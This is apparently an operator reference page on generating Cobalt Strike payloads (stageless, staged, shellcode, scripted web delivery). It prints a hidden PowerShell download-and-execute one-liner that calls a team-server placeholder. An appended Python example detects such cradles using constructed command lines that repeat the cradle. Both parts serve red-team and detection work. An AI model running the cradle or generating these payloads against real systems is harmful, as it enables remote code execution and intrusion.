Payload Generation
Generating Cobalt Strike payloads — stageless, staged, shellcode, and scripted web delivery.
Stageless Payload Generation
Generate all stageless payloads at once (recommended after creating listeners):
Payloads > Windows Stageless Generate All Payloads
Save to C:\Payloads for quick access. Generates every format (EXE, DLL, shellcode, PowerShell) for all listeners in x86 and x64.
Individual Stageless Payload
Payloads > Windows Stageless Payload
Options:
- Listener — select target listener
- Output — EXE, Service EXE, DLL, Raw (shellcode), PowerShell
- x64 / x86 — architecture
- Exit Function — process or thread (thread recommended for injection)
Stager Payload Generation
Payloads > Windows Stager Payload
Generates a small stager that fetches the full beacon. Available as EXE, Service EXE, or DLL.
Stager Code Generator
Payloads > Stager Payload Generator
Outputs stager source code in: C, C#, PowerShell, Python, VBA. Useful for building custom loaders or embedding in exploits.
Shellcode Export
Payloads > Windows Stageless Payload > Output: Raw
Exports raw shellcode (.bin) for use in custom loaders, process injection, or encoding pipelines.
See also: Generation & Encoding for XOR encoding and format conversion.
Scripted Web Delivery
Host a payload on the team server for one-liner download-and-execute:
Attacks > Web Drive-by > Scripted Web Delivery
Options:
- URI Path — URL path (e.g. /a)
- Listener — beacon listener to use
- Type — PowerShell, Python, bitsadmin, exe
Generates a one-liner like:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://<TEAMSERVER>/a'))"
See also: 2. Beacons & Listeners, 4. Evasion & Artifact Kit
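The Scripted Web Delivery one-liner shown above leaves a recognisable command line in process-creation telemetry (Windows Security Event ID 4688 with command-line logging, or Sysmon Event ID 1). The following is an added detection example, not part of the original page or of Cobalt Strike; the function names, indicator names and sample command lines are constructed for illustration.

```python
import re

def _param(full, min_len, value=""):
    """powershell.exe accepts any unambiguous, case-insensitive prefix of a
    parameter name, so match every prefix of `full` down to min_len chars."""
    names = "|".join(full[:i] for i in range(len(full), min_len - 1, -1))
    tail = rf"\s+{value}" if value else ""
    return re.compile(rf"(?:^|\s)[-/](?:{names}){tail}(?=\s|$)", re.I)

IS_POWERSHELL = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)
INDICATORS = {  # indicator names are this example's own
    "no_profile": _param("noprofile", 3),
    "hidden_window": _param("windowstyle", 1, "hidden"),
    "inline_command": _param("command", 1),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "web_download": re.compile(
        r"net\.webclient\b.*?\.download(?:string|data|file)\s*\(", re.I),
}
URL = re.compile(r"""download\w+\s*\(\s*['"]([^'"]+)['"]""", re.I)

def analyze(cmdline):
    """Return matched indicators, the fetched URL, and an alert verdict."""
    if not IS_POWERSHELL.search(cmdline):
        return {"hits": [], "url": None, "alert": False}
    hits = sorted(n for n, rx in INDICATORS.items() if rx.search(cmdline))
    url = URL.search(cmdline)
    # Alert on download-and-execute combined with at least one stealth flag.
    cradle = {"invoke_expression", "web_download"} <= set(hits)
    stealth = bool({"no_profile", "hidden_window"} & set(hits))
    return {"hits": hits, "url": url.group(1) if url else None,
            "alert": cradle and stealth}

# Constructed process command lines (not real telemetry).
SAMPLES = [
    "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient)"
    ".downloadstring('http://<TEAMSERVER>/a'))\"",
    "PowerShell -NoProfile -WindowStyle Hidden -Command \"Invoke-Expression "
    "((New-Object Net.WebClient).DownloadString('http://host.example/a'))\"",
    r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    "powershell -c \"(New-Object Net.WebClient).DownloadFile("
    "'https://intranet.example/tool.msi', 'tool.msi')\"",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze(line)["alert"], analyze(line)["url"], "|", line)
```

Command-line matching does not see scripts passed with -EncodedCommand; PowerShell Script Block Logging (Event ID 4104) records the decoded script text and covers that case.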